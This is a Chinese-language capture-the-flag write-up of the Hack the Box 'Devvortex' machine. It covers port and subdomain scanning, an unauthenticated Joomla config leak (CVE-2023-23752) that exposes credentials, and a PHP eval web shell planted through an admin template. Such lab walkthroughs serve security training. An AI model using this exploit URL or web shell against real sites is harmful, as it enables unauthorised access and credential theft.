Hack the Box Devvoryex 靶场记录

p0w1rSh4ll

2024-02-03

WriteUp

CTF, Security

启动连接靶场后，使用nmap扫描地址的路径：

root@kali:~/Desktop# nmap -T4 -A -v -Pn 10.10.11.242
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-25 00:12 CST
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 00:12
Completed NSE at 00:12, 0.00s elapsed
Initiating NSE at 00:12
Completed NSE at 00:12, 0.00s elapsed
Initiating NSE at 00:12
Completed NSE at 00:12, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 00:12
Completed Parallel DNS resolution of 1 host. at 00:12, 0.01s elapsed
Initiating SYN Stealth Scan at 00:12
Scanning 10.10.11.242 [1000 ports]
Discovered open port 22/tcp on 10.10.11.242
Discovered open port 80/tcp on 10.10.11.242
Increasing send delay for 10.10.11.242 from 0 to 5 due to max_successful_tryno increase to 5
Increasing send delay for 10.10.11.242 from 5 to 10 due to max_successful_tryno increase to 6
Completed SYN Stealth Scan at 00:13, 48.63s elapsed (1000 total ports)
Initiating Service scan at 00:13
Scanning 2 services on 10.10.11.242
Completed Service scan at 00:13, 7.42s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against 10.10.11.242
Retrying OS detection (try #2) against 10.10.11.242
Retrying OS detection (try #3) against 10.10.11.242
Initiating Traceroute at 00:14
Completed Traceroute at 00:14, 1.81s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 00:14
Completed Parallel DNS resolution of 2 hosts. at 00:14, 0.01s elapsed
NSE: Script scanning 10.10.11.242.
Initiating NSE at 00:14
Completed NSE at 00:14, 27.06s elapsed
Initiating NSE at 00:14
Completed NSE at 00:14, 4.96s elapsed
Initiating NSE at 00:14
Completed NSE at 00:14, 0.00s elapsed
Nmap scan report for 10.10.11.242
Host is up (0.50s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
|   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_  256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://devvortex.htb/
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.18.0 (Ubuntu)
Aggressive OS guesses: Linux 5.0 (97%), Linux 4.15 - 5.8 (96%), Linux 5.3 - 5.4 (95%), Linux 2.6.32 (95%), Linux 5.0 - 5.5 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 0.000 days (since Thu Jan 25 00:14:02 2024)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=252 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 111/tcp)
HOP RTT       ADDRESS
1   792.32 ms 10.10.14.1
2   792.48 ms 10.10.11.242

NSE: Script Post-scanning.
Initiating NSE at 00:14
Completed NSE at 00:14, 0.00s elapsed
Initiating NSE at 00:14
Completed NSE at 00:14, 0.00s elapsed
Initiating NSE at 00:14
Completed NSE at 00:14, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 115.80 seconds
           Raw packets sent: 1442 (66.912KB) | Rcvd: 1303 (58.018KB)

从上面扫描的结果来看，可以发现主机开启了80和22端口，那么就先从80端口下手。

可以尝试访问80端口，但是发现页面无法打开，那么就尝试将IP和域名在host表中进行绑定

root@kali:~/Desktop# vim /etc/hosts 
root@kali:~/Desktop# cat /etc/hosts            
127.0.0.1       localhost
127.0.1.1       kali
10.10.11.242    devvortex.htb

然后在浏览器中继续访问刚才的地址，可以发现现在就可以正常访问到页面了。

页面浏览之后并没有发现什么有价值的东西，接下来尝试对网站目录进行扫描，使用的是dirsearch：

root@kali:~/Desktop# dirsearch -u http://devvortex.htb/
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3                                          
 (_||| _) (/_(_|| (_| )                                                   
                                                                          
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25
Wordlist size: 11460

Output File: /root/Desktop/reports/http_devvortex.htb/__24-01-25_00-22-59.txt

Target: http://devvortex.htb/

[00:22:59] Starting:                                                      
[00:23:25] 301 -  178B  - /js  ->  http://devvortex.htb/js/
[00:24:19] 200 -    7KB - /about.html                                     
[00:25:48] 200 -    9KB - /contact.html                                   
[00:25:53] 301 -  178B  - /css  ->  http://devvortex.htb/css/             
[00:26:43] 301 -  178B  - /images  ->  http://devvortex.htb/images/       
[00:26:43] 403 -  564B  - /images/                                        
[00:26:50] 403 -  564B  - /js/

Task Completed

接下来尝试扫描子域名，使用 gobuster：

1	root@kali:~/Desktop# gobuster vhost -u http://devvortex.htb -w /usr/share/wordlists/amass/subdomains-top1mil-20000.txt --threads=40 --timeout=20s --append-domain

扫描子域名后发现存在一个子域名，且状态码200，说明可以访问，那么就将这个子域名加入到hosts文件中

root@kali:~/Desktop# cat /etc/hosts
127.0.0.1       localhost
127.0.1.1       kali
10.10.11.242    devvortex.htb
10.10.11.242    dev.devvortex.htb

接下来访问这个子域名网站，并且扫描子域名网站

1	root@kali:~/Desktop# dirsearch -u http://dev.devvortex.htb

扫描后可以发现有个administrator的子目录，尝试访问：

可以看到，这是一个部署了Joomla服务的站点，网上搜索历史漏洞，可以得知有个未授权访问漏洞，CVE-2023-23752

只要访问链接http://dev.devvortex.htb/api/index.php/v1/config/application?public=true,可以获取到用户的用户名和密码：

登录成功后如下所示：

进来之后，通过查找页面选项，可以发现在system处有一个Administrator Templates 的功能按钮，可以直接仙剑文件。

一句话木马写入:

1	<?php @eval($_POST['aaa']);?>

写入后，使用蚁剑进行连接

通过查找目录文件，可以发现在配置文件中存在数据库的用户名和密码，并且是MySQL数据库

这里要注意下数据库的类型选择的是MySQLLI。